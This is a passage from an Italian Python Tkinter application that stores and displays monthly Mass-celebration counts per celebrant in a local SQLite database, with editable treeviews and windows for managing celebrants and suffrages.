trace_when_Entry_widget_is_updated)\nEntry_Suffragi_Personali_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Devozione_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Benefattori_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Pro_Populo_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\n\n# List Anni\nAnni = [2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030]\n\n# Dropbox Anno\nEntry_Anno_combo = ttk.Combobox(Frame_combo, font=(\"Helvetica\", 10), values=Anni, textvariable=Entry_Anno_combo_IntVar)\nEntry_Anno_combo.current(4)\nEntry_Anno_combo.grid(row=2, column=0)\nEntry_Anno_combo['state'] = 'readonly'\n\n\n# List Mesi\nMesi = [\"gennaio\",\n \"febbraio\",\n \"marzo\",\n \"aprile\",\n \"maggio\",\n \"giugno\",\n \"luglio\",\n \"agosto\",\n \"settembre\",\n \"ottobre\",\n \"novembre\",\n \"dicembre\",\n ]\n\n\n\n# Dropbox Mesi\n#Entry_Mese_combo = ttk.Combobox(Frame_combo, font=(\"Helvetica\", 10), values=Mesi, textvariable=Entry_Mese_combo_StringVar)\nEntry_Mese_combo = AutocompleteCombobox(Frame_combo, font=(\"Helvetica\", 10), completevalues=Mesi, textvariable=Entry_Mese_combo_StringVar)\n\nEntry_Mese_combo.current(0)\nEntry_Mese_combo.grid(row=2, column=1)\n#Entry_Mese_combo['state'] = 'readonly'\n\nconn = sqlite3.connect('database_messe_orizzontale')\ncur = conn.cursor()\nquery = \"SELECT DISTINCT (Celebranti) as Celebranti FROM TABLE_Celebranti\"\nmy_Data = cur.execute(query)\nNomi_Celebranti = [r for r, in my_Data]\nEntry_Nome_Celebrante_combo = ttk.Combobox(Frame_combo, font=(\"Helvetica\", 10), values=Nomi_Celebranti, textvariable=Entry_Nome_Celebrante_combo_StringVar)\nEntry_Nome_Celebrante_combo.current(1)\nEntry_Nome_Celebrante_combo.grid(row=2, column=2)\n# Commit changes\nconn.commit()\n# Close our connection\nconn.close()\n\nEntry_Ad_Mentem_combo = Spinbox(Frame_combo, from_=0, to=31, wrap=True, width=11, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Ad_Mentem_combo_IntVar)\nEntry_Ad_Mentem_combo.grid\\\n (row=2, column=3)\nEntry_Binate_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=10, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Binate_combo_IntVar)\nEntry_Binate_combo.grid\\\n (row=2, column=4)\nEntry_Binate_Conc_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=11, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Binate_Conc_combo_IntVar)\nEntry_Binate_Conc_combo.grid\\\n (row=2, column=5)\nEntry_Trinate_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=10, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Trinate_combo_IntVar)\nEntry_Trinate_combo.grid\\\n (row=2, column=6)\nEntry_Suffragi_Comunitari_combo = Spinbox(Frame_combo, from_=0, to=31,wrap=True, width=11,font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Suffragi_Comunitari_combo_IntVar)\nEntry_Suffragi_Comunitari_combo.grid\\\n (row=2, column=7)\nEntry_Suffragi_Personali_combo = Spinbox(Frame_combo, from_=0, to=31,wrap=True, width=10,font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Suffragi_Personali_combo_IntVar)\nEntry_Suffragi_Personali_combo.grid\\\n (row=2, column=8)\nEntry_Devozione_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=11, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Devozione_combo_IntVar)\nEntry_Devozione_combo.grid\\\n (row=2, column=9)\nEntry_Benefattori_combo = Spinbox(Frame_combo, from_=0, to=31,wrap=True, width=11,font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Benefattori_combo_IntVar)\nEntry_Benefattori_combo.grid\\\n (row=2, column=10)\nEntry_Pro_Populo_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=11, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Pro_Populo_combo_IntVar)\nEntry_Pro_Populo_combo.grid\\\n (row=2, column=11)\n\n\n\n\n\n\n\n############################\n####### TREEVIEW ###########\n############################\n\n\n\n# Add some style\nstyle = ttk.Style()\n# Pick a theme\nstyle.theme_use(\"default\")\n\n# Configure our treeview colors\nstyle.configure(\"Treeview\",\n background=\"#D3D3D3\",\n foreground=\"black\",\n rowheight=30,\n fieldbackground=\"#D3D3D3\",\n font=('Calibri', 12)\n )\n\n# Headings\nstyle.configure(\"Treeview.Heading\",\n font=('Calibri', 12, 'bold')\n )\n\n# Change selected color\nstyle.map('Treeview',\n background=[('selected', 'blue')]\n )\n\n# Treeview Scrollbar\ntree_scroll = Scrollbar(Frame_tree)\ntree_scroll.pack(side=RIGHT, fill=Y)\n\n# Create Treeview\nmy_tree = ttk.Treeview(Frame_tree, yscrollcommand=tree_scroll.set, selectmode=\"extended\")\n# Pack to the screen\nmy_tree.pack()\n\n# Configure the scrollbar\ntree_scroll.config(command=my_tree.yview)\n\n# Define Our Columns\nmy_tree['columns'] = (\"ID\", \"Anno\", \"Mese\", \"Nome_Celebrante\", \"Ad_Mentem\", \"Binate\", \"Binate_Concelebrate\", \"Trinate\", \"Suffragi_Comunitari\", \"Suffragi_Personali\", \"Devozione\", \"Benefattori\", \"Pro_Populo\")\n\n\n\n\n\n# Formate Our Columns\nmy_tree.column(\"#0\", width=0, stretch=NO)\nmy_tree.column(\"ID\", anchor=W, width=70)\nmy_tree.column(\"Anno\", anchor=W, width=120)\nmy_tree.column(\"Mese\", anchor=W, width=120)\nmy_tree.column(\"Nome_Celebrante\", anchor=W, width=165)\nmy_tree.column(\"Ad_Mentem\", anchor=W, width=120)\nmy_tree.column(\"Binate\", anchor=W, width=120)\nmy_tree.column(\"Binate_Concelebrate\", anchor=W, width=120)\nmy_tree.column(\"Trinate\", anchor=W, width=120)\nmy_tree.column(\"Suffragi_Comunitari\", anchor=W, width=120)\nmy_tree.column(\"Suffragi_Personali\", anchor=W, width=120)\nmy_tree.column(\"Devozione\", anchor=W, width=120)\nmy_tree.column(\"Benefattori\", anchor=W, width=120)\nmy_tree.column(\"Pro_Populo\", anchor=W, width=120)\n\n\n# Create Headings\nmy_tree.heading(\"#0\", text=\"\", anchor=W)\nmy_tree.heading(\"ID\", text=\"Id\", anchor=W)\nmy_tree.heading(\"Anno\", text=\"Anno\", anchor=W)\nmy_tree.heading(\"Mese\", text=\"Mese\", anchor=W)\nmy_tree.heading(\"Nome_Celebrante\", text=\"Celebrante\", anchor=W)\nmy_tree.heading(\"Ad_Mentem\", text=\"Ad_Ment\", anchor=W)\nmy_tree.heading(\"Binate\", text=\"Binate\", anchor=W)\nmy_tree.heading(\"Binate_Concelebrate\", text=\"Bin_Concel\", anchor=W)\nmy_tree.heading(\"Trinate\", text=\"Trinate\", anchor=W)\nmy_tree.heading(\"Suffragi_Comunitari\", text=\"Suffr_Com\", anchor=W)\nmy_tree.heading(\"Suffragi_Personali\", text=\"Suffr_Pers\", anchor=W)\nmy_tree.heading(\"Devozione\", text=\"Devozione\", anchor=W)\nmy_tree.heading(\"Benefattori\", text=\"Benefattori\", anchor=W)\nmy_tree.heading(\"Pro_Populo\", text=\"Pro_Populo\", anchor=W)\n\ndef on_double_click(event):\n region_clicked = my_tree.identify_region(event.x, event.y)\n #print(region_clicked) >cell oppure >header\n\n # numero di colonna della riga su cui faccio doppio click\n column = my_tree.identify_column(event.x)\n #print(column) # esempio #4\n # numero colonna senza # davanti: numero intero\n #la prima colonna del treeview è = 1\n # sottraggo -1 perchè nelle touple primo valore è 0\n # [1:] inizia dal secondo carattere (dunque salta #)\n column_index = int(column[1:])-1 #NUMERO COLONNA\n #print(column_index)\n\n #mi da l'ID della riga su cui faccio doppio click\n selected_iid=my_tree.focus() #ID RIGA\n #print(selected_iid) #esempio 16\n\n selected_values = my_tree.item(selected_iid) #('11', '2024', 'febbraio', 'fra Giacomo Rotunno', '0', '0', '0', '0', '0', '0', '0', '0', '0')\n\n if column_index == '0':\n selected_text = selected_values.get('text')\n #print(selected_text)\n else:\n selected_text = selected_values.get('values')[column_index]\n #print(selected_text)\n\n #posizione e dimensioni cella selezionata\n column_box = my_tree.bbox(selected_iid, column) #print(column) esempio '#4'\n #print(column_box) #(1, 112, 70, 30) (x_position, y_position, Width, Height)\n\n entry_edit = ttk.Entry(Frame_tree, width=column_box[2])\n\n #salvo valori di colonna e riga in variabili\n #Record column index and item iid\n entry_edit.editing_column_index = column_index\n #print(entry_edit.editing_column_index) # esempio 1\n entry_edit.editing_item_iid = selected_iid\n #print(entry_edit.editing_item_id) #esempio 9\n\n\n entry_edit.place(x = column_box[0],\n y = column_box[1],\n w = column_box[2],\n h = column_box[3])\n\n # mi inserisce il valore della casella selezionata\n entry_edit.insert(0, selected_text)\n #seleziona il testo\n entry_edit.select_range(0, END)\n #place the focus on the widget\n entry_edit.focus()\n\n #event.widget reference the entry widget\n def on_focus_out(event):\n event.widget.destroy()\n\n #ricorda che funziona solo se premi ENTER\n def on_enter_pressed(event):\n # event.widget reference the entry widget\n new_text = event.widget.get() #salva in new_text il testo modificato\n # print('°°°°°°')\n # print(new_text)\n #We also want to know the item ID\n selected_iid = event.widget.editing_item_iid #numero di riga\n # print('#############')\n # print(selected_iid)\n column_index = event.widget.editing_column_index #numero di colonna. la prima colonna è 0\n # print('#############')\n # print(column_index)\n if column_index == 0: # l'ID non si deve cambiare\n pass\n else:\n current_values = my_tree.item(selected_iid).get(\"values\")\n #print(current_values) # [13, 2024, 'gennaio', 'Fra Alberto Dos Santos', 11, 0, 0, 0, 0, 0, 0, 0, 0]\n # {'text': '', 'image': '', 'values': [15, 2024, 'gennaio', 'Ospite', 28, 0, 0, 0, 0, 0, 0, 0, 0], 'open': 0, 'tags': ['oddrow']}\n\n #print(current_values)\n current_values[column_index]=new_text\n #print(current_values)\n my_tree.item(selected_iid, values=current_values)\n\n\n event.widget.destroy()\n\n # Update the database\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n #\n # Create a cursor instance\n c = conn.cursor()\n print(conn)\n\n c.execute(\"\"\" UPDATE TABLE_Messe \n SET\n Anno = :Anno,\n Mese = :Mese,\n Nome_Celebrante = :Nome_Celebrante,\n Ad_Mentem = :Ad_Mentem,\n Binate = :Binate,\n Binate_Concelebrate = :Binate_Concelebrate,\n Trinate = :Trinate,\n Suffragi_Comunitari = :Suffragi_Comunitari,\n Suffragi_Personali = :Suffragi_Personali,\n Devozione = :Devozione,\n Benefattori = :Benefattori,\n Pro_Populo = :Pro_Populo\n\n\n \t\t WHERE oid =\"\"\" + selected_iid,\n {\n 'Anno': current_values[1],\n 'Mese': current_values[2],\n 'Nome_Celebrante': current_values[3],\n 'Ad_Mentem': current_values[4],\n 'Binate': current_values[5],\n 'Binate_Concelebrate': current_values[6],\n 'Trinate': current_values[7],\n 'Suffragi_Comunitari': current_values[8],\n 'Suffragi_Personali': current_values[8],\n 'Devozione': current_values[10],\n 'Benefattori': current_values[11],\n 'Pro_Populo': current_values[12]\n })\n\n # Commit changes\n conn.commit()\n #\n # # Close our connection\n conn.close()\n # Add a little message box for fun\n messagebox.showinfo(\"Updated!\", \"Riga aggiornata!\")\n\n #when I click outside I want the widget to disappear\n entry_edit.bind(\"\", on_focus_out)\n\n #When I click enter UPDATE tree\n entry_edit.bind(\"\", on_enter_pressed)\n\n\n\n\nmy_tree.bind(\"\", on_double_click)\n\n\n############################\n######## SQLITE3 ###########\n############################\n\n# Insert into TABLE_Conti\ndef submit():\n conn = sqlite3.connect('database_messe_orizzontale')\n cur = conn.cursor()\n\n #dati presi dalla combo di inserimento (non update)\n dati = [(Entry_Anno_combo_IntVar.get(),\n Entry_Mese_combo_StringVar.get(),\n Entry_Nome_Celebrante_combo_StringVar.get(),\n Entry_Ad_Mentem_combo_IntVar.get(),\n Entry_Binate_combo_IntVar.get(),\n Entry_Binate_Conc_combo_IntVar.get(),\n Entry_Trinate_combo_IntVar.get(),\n Entry_Suffragi_Comunitari_combo_IntVar.get(),\n Entry_Suffragi_Personali_combo_IntVar.get(),\n Entry_Devozione_combo_IntVar.get(),\n Entry_Benefattori_combo_IntVar.get(),\n Entry_Pro_Populo_combo_IntVar.get()\n )]\n\n\n cur.executemany(\n 'INSERT INTO TABLE_Messe (Anno, Mese, Nome_Celebrante, Ad_Mentem, Binate, Binate_Concelebrate, Trinate, Suffragi_Comunitari, Suffragi_Personali, Devozione, Benefattori, Pro_Populo) VALUES (?,?,?,?,?,?,?,?,?,?,?,?)', dati)\n\n\n\n conn.commit()\n # Close our connection\n conn.close()\n\ndef query_database():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n sql_select_query = \"\"\"select * from TABLE_Messe where Anno = ? and Mese = ? order by ID DESC \"\"\"\n c.execute(sql_select_query, (2024, 'gennaio',))\n records = c.fetchall()\n # for x in records:\n # print(x)\n # print('##################################################')\n\n # c.execute(\"SELECT * FROM TABLE_Messe ORDER BY Anno, (CASE Mese\\\n # WHEN 'gennaio' THEN 1\\\n # WHEN 'febbraio' THEN 2\\\n # WHEN 'marzo' THEN 3\\\n # WHEN 'aprile' THEN 4\\\n # WHEN 'maggio' THEN 5\\\n # WHEN 'giugno' THEN 6\\\n # WHEN 'luglio' THEN 7\\\n # WHEN 'agosto' THEN 8\\\n # WHEN 'settembre' THEN 9\\\n # WHEN 'ottobre' THEN 10\\\n # WHEN 'novembre' THEN 11\\\n # WHEN 'dicembre' THEN 12\\\n # END);\")\n c.execute(\"SELECT * FROM TABLE_Messe\")\n records = c.fetchall()\n # for x in records:\n # print(x)\n\n\n # for record in records:\n # print(record)\n # record[0] = id key\n\n # COLORI RIGHE pari e dispari\n count = 0\n # Create striped row tags\n my_tree.tag_configure('oddrow', background=\"white\")\n my_tree.tag_configure('evenrow', background=\"lightblue\")\n\n for record in records:\n if count % 2 == 0:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7], record[8], record[9], record[10], record[11], record[12]),\n tags=('evenrow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],record[8], record[9], record[10], record[11], record[12]),\n tags = ('oddrow'))\n count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\ndef query_database_BY_DATE():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # sql_select_query = \"\"\"select * from TABLE_Messe where Anno = ? and Mese = ? order by ID DESC \"\"\"\n # c.execute(sql_select_query, (2024, 'gennaio',))\n # records = c.fetchall()\n # for x in records:\n # print(x)\n # print('##################################################')\n\n c.execute(\"SELECT * FROM TABLE_Messe ORDER BY Anno, (CASE Mese\\\n WHEN 'gennaio' THEN 1\\\n WHEN 'febbraio' THEN 2\\\n WHEN 'marzo' THEN 3\\\n WHEN 'aprile' THEN 4\\\n WHEN 'maggio' THEN 5\\\n WHEN 'giugno' THEN 6\\\n WHEN 'luglio' THEN 7\\\n WHEN 'agosto' THEN 8\\\n WHEN 'settembre' THEN 9\\\n WHEN 'ottobre' THEN 10\\\n WHEN 'novembre' THEN 11\\\n WHEN 'dicembre' THEN 12\\\n END), Nome_Celebrante;\")\n\n records = c.fetchall()\n # for x in records:\n # print(x)\n\n\n # for record in records:\n # print(record)\n # record[0] = id key\n\n # COLORI RIGHE pari e dispari\n #count = 0\n # Create striped row tags\n my_tree.tag_configure('white', background=\"pink\")\n my_tree.tag_configure('blue', background=\"salmon\")\n my_tree.tag_configure('yellow', background=\"lightyellow\")\n my_tree.tag_configure('violet', background=\"khaki\")\n\n for record in records:\n if record[2] == 'gennaio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7], record[8], record[9], record[10], record[11], record[12]),\n tags=('white'))\n elif record[2] == 'febbraio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],record[8], record[9], record[10], record[11], record[12]),\n tags=('blue'))\n elif record[2] == 'marzo':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('yellow'))\n elif record[2] == 'aprile':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('violet'))\n elif record[2] == 'maggio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('white'))\n elif record[2] == 'giugno':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('blue'))\n elif record[2] == 'luglio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('yellow'))\n elif record[2] == 'agosto':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('violet'))\n elif record[2] == 'settembre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('white'))\n elif record[2] == 'ottobre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('blue'))\n\n elif record[2] == 'novembre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('yellow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],record[8], record[9], record[10], record[11], record[12]),\n tags = ('violet'))\n #count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n\n\n#######################\ndef remove_one():\n # my_tree.focus() restituisce l'ID della riga selezionata\n row_id = my_tree.focus()\n my_tree.delete(row_id)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # Delete From Database\n c.execute(\"DELETE from TABLE_Messe WHERE oid =\" + row_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n # Add a little message box for fun\n messagebox.showinfo(\"Deleted\", \"Riga Cancellata!\")\n\n##############################################################\n##########TOP WINDOW CELEBRANTI###############################\n##############################################################\n\ndef Top_W_Celebranti():\n top = Toplevel()\n top.geometry(\"380x500\")\n top.title(\"Celebranti\")\n\n Frame_top_tree = Frame(top, bd='4', bg=background_Blu, relief=RIDGE)\n Frame_top_tree.pack()\n\n\n Label_Celebranti = Label(top, text='Celebranti:', font=('verdana', 8, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n Label_Celebranti.pack()\n\n Entry_Celebranti_StringVar = StringVar()\n\n Entry_Celebranti = Entry(top, bd=5, textvariable=Entry_Celebranti_StringVar)\n Entry_Celebranti.pack()\n\n \n\n ############################\n ####### TREEVIEW ###########\n ############################\n\n # Add some style\n style = ttk.Style()\n # Pick a theme\n style.theme_use(\"default\")\n\n # Configure our treeview colors\n style.configure(\"Treeview\",\n background=\"#D3D3D3\",\n foreground=\"black\",\n rowheight=30,\n fieldbackground=\"#D3D3D3\",\n font=('Calibri', 12)\n )\n\n # Headings\n style.configure(\"Treeview.Heading\",\n font=('Calibri', 12, 'bold')\n )\n\n # Change selected color\n style.map('Treeview',\n background=[('selected', 'blue')]\n )\n\n # Treeview Scrollbar\n tree_scroll = Scrollbar(Frame_top_tree)\n tree_scroll.pack(side=RIGHT, fill=Y)\n\n # Create Treeview\n my_tree = ttk.Treeview(Frame_top_tree, yscrollcommand=tree_scroll.set, selectmode=\"extended\")\n # Pack to the screen\n my_tree.pack()\n\n # Configure the scrollbar\n tree_scroll.config(command=my_tree.yview)\n\n # Define Our Columns\n my_tree['columns'] = (\"ID\", \"Celebranti\")\n\n # Formate Our Columns\n my_tree.column(\"#0\", width=0, stretch=NO)\n my_tree.column(\"ID\", anchor=W, width=70)\n my_tree.column(\"Celebranti\", anchor=W, width=200)\n\n\n # Create Headings\n my_tree.heading(\"#0\", text=\"\", anchor=W)\n my_tree.heading(\"ID\", text=\"Id\", anchor=W)\n my_tree.heading(\"Celebranti\", text=\"Celebranti\", anchor=W)\n\n\n\n def query_database():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n c.execute(\"SELECT * FROM TABLE_Celebranti;\")\n records = c.fetchall()\n # for x in records:\n # print('Table Messe')\n # print(x)\n\n # COLORI RIGHE pari e dispari\n count = 0\n # Create striped row tags\n my_tree.tag_configure('oddrow', background=\"white\")\n my_tree.tag_configure('evenrow', background=\"lightblue\")\n\n for record in records:\n if count % 2 == 0:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0],\n record[1]),\n tags=('evenrow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0],\n record[1]),\n tags=('oddrow'))\n count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n def remove_one():\n # my_tree.focus() restituisce l'ID della riga selezionata\n row_id = my_tree.focus()\n my_tree.delete(row_id)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # Delete From Database\n c.execute(\"DELETE from TABLE_Celebranti WHERE oid =\" + row_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n\n def submit():\n conn = sqlite3.connect('database_messe_orizzontale')\n cur = conn.cursor()\n dati = [Entry_Celebranti_StringVar.get()]\n cur.execute('INSERT INTO TABLE_Celebranti (Celebranti) VALUES (?)', dati)\n #cur.execute(\"insert into TABLE_Celebranti (Celebranti) values ('?'), dati\")\n #cur.execute('''INSERT INTO TABLE_Celebranti (Celebranti) VALUES (\"Entry_Celebranti_StringVar.get()\")''')\n conn.commit()\n # Close our connection\n conn.close()\n\n B_add_celebranti = Button(top, text='aggiungi', width=10, command=lambda: [submit(), query_database()]).pack(side=TOP, pady=20)\n B_delete_celebranti = Button(top, text='cancella', width=10, command=remove_one).pack(side=TOP, pady=20)\n\n query_database()\n top.mainloop()\n\n\n##############################################################\n############ WINDOW Suffragi ###############################\n##############################################################\n\ndef Suffragi_Comunitari():\n\n\n Label_Titolo_Suffragi= Label(Frame_Suffragi, text='Inserire i suffragi comunitari:', font=('verdana', 12, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n Label_Titolo_Suffragi.grid(column=0,row=0, columnspan=2, sticky=\"W\")\n\n # List Anni\n Anni = [2020, 2021, 2022, 2023, 2024, 2025, 2026, 2027, 2028, 2029, 2030]\n\n Label_Anno_Suffragi = Label(Frame_Suffragi, text='Anno:', font=('verdana', 12, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n Label_Anno_Suffragi.grid(row=1, column=0, sticky=\"W\",pady=5)\n\n # Dropbox Anno\n Entry_Anno_Suffragi_StringVar = StringVar()\n Entry_Anno_Suffragi = ttk.Combobox(Frame_Suffragi, font=(\"Helvetica\", 10), values=Anni,\n textvariable=Entry_Anno_Suffragi_StringVar)\n #Entry_Anno_Suffragi.current(4)\n Entry_Anno_Suffragi.grid(row=1, column=1, sticky=\"W\",pady=5)\n #Entry_Anno_combo['state'] = 'readonly'\n\n # List Mesi\n Mesi = [\"gennaio\",\n \"febbraio\",\n \"marzo\",\n \"aprile\",\n \"maggio\",\n \"giugno\",\n \"luglio\",\n \"agosto\",\n \"settembre\",\n \"ottobre\",\n \"novembre\",\n \"dicembre\",\n ]\n\n Label_Mese_Suffragi= Label(Frame_Suffragi, text='Mese:', font=('verdana', 12, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n Label_Mese_Suffragi.grid(column=0,row=2, sticky=\"W\", pady=5)\n\n # Dropbox Mesi\n Entry_Mese_Suffragi_StringVar = StringVar()\n Entry_Mese_Suffragi = ttk.Combobox(Frame_Suffragi, font=(\"Helvetica\", 10), values=Mesi, textvariable=Entry_Mese_Suffragi_StringVar)\n\n\n #Entry_Mese_Suffragi.current(0)\n Entry_Mese_Suffragi.grid(row=2, column=1, sticky=\"W\", pady=5)\n\n\n Label_Suffragi = Label(Frame_Suffragi, text='Suffragi:', font=('verdana', 12, 'bold'), bg=background_Blu,\n fg=foreground_Bianco)\n Label_Suffragi.grid(column=0,row=3, sticky=\"W\", pady=5)\n Entry_Suffragi_StringVar = StringVar()\n Entry_Suffragi = Entry(Frame_Suffragi, bd=5, textvariable=Entry_Suffragi_StringVar)\n Entry_Suffragi.grid(column=1, row=3, sticky=\"W\", pady=5)\n\n Frame_suffragi_tree = Frame(Frame_Suffragi, bd='4', bg=background_Blu, relief=RIDGE)\n Frame_suffragi_tree.grid(column=0, row=4, columnspan=4, pady=12, padx=2)\n\n\n ############################\n ####### TREEVIEW ###########\n ############################\n\n # Add some style\n style = ttk.Style()\n # Pick a theme\n style.theme_use(\"default\")\n\n # Configure our treeview colors\n style.configure(\"Treeview\",\n background=\"#D3D3D3\",\n foreground=\"black\",\n rowheight=30,\n fieldbackground=\"#D3D3D3\",\n font=('Calibri', 12)\n )\n\n # Headings\n style.configure(\"Treeview.Heading\",\n font=('Calibri', 12, 'bold')\n )\n\n # Change selected color\n style.map('Treeview',\n background=[('selected', 'blue')]\n )\n\n # Treeview Scrollbar\n tree_scroll = Scrollbar(Frame_suffragi_tree)\n tree_scroll.pack(side=RIGHT, fill=Y)\n\n # Create Treeview\n my_tree = ttk.Treeview(Frame_suffragi_tree, yscrollcommand=tree_scroll.set, selectmode=\"extended\", height=9)\n # Pack to the screen\n my_tree.pack()\n\n # Configure the scrollbar\n tree_scroll.config(command=my_tree.yview)\n\n # Define Our Columns\n my_tree['columns'] = (\"ID\", \"Anno\", \"Mese\", \"Suffragi\")\n\n # Formate Our Columns\n my_tree.column(\"#0\", width=0, stretch=NO)\n my_tree.column(\"ID\", anchor=W, width=40)\n my_tree.column(\"Anno\", anchor=W, width=70)\n my_tree.column(\"Mese\", anchor=W, width=70)\n my_tree.column(\"Suffragi\", anchor=W, width=250)\n\n # Create Headings\n my_tree.heading(\"#0\", text=\"\", anchor=W)\n my_tree.heading(\"ID\", text=\"Id\", anchor=W)\n my_tree.heading(\"Anno\", text=\"Anno\", anchor=W)\n my_tree.heading(\"Mese\", text=\"Mese\", anchor=W)\n my_tree.heading(\"Suffragi\", text=\"Suffragi\", anchor=W)\n\n def query_suffragi_database():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n c.execute(\"SELECT * FROM TABLE_Suffragi;\")\n records = c.fetchall()\n for x in records:\n print('TABLE_Suffragi')\n print(x)\n #\n # COLORI RIGHE pari e dispari\n count = 0\n # Create striped row tags\n my_tree.tag_configure('oddrow', background=\"white\")\n my_tree.tag_configure('evenrow', background=\"lightblue\")\n\n for record in records:\n if count % 2 == 0:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values= (\n record[0],\n record[1],\n record[2],\n record[3]\n ),\n tags=('evenrow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values= (\n record[0],\n record[1],\n record[2],\n record[3]\n ),\n tags=('oddrow'))\n count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n 